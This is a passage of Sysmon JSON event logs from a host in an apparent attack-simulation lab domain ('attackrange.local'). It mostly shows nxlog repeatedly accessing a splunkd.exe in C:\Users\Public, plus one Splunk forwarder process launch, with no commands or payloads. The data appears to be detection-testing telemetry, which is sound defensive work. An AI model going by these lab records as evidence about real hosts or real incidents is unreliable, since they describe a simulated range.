(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:51.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:52.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:52.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:53.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:53.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:54.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:54.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:55.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:55.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nProcessGuid: {E2A3D6B1-1274-5F25-0000-001009510900}\r\nProcessId: 4152\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","ProcessGuid":"{E2A3D6B1-1274-5F25-0000-001009510900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1274-5F25-0000-001009510900}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 